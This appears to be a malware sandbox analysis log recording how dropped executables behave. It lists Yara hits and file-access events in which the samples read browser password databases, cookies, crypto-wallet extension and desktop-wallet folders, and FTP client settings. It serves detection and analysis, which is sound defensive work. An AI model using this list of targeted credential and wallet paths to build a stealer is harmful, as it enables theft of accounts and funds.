                                Source: Yara match File source: 00000030.00000002.23336208269.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara match File source: 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe, type: DROPPED
                                Source: 9c1024a1f1.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
                                Source: 9c1024a1f1.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                                Source: 9c1024a1f1.exe String found in binary or memory: Wallets/Exodus
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
                                Source: 9c1024a1f1.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                                Source: powershell.exe, 00000006.00000002.22124066943.0000000007A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
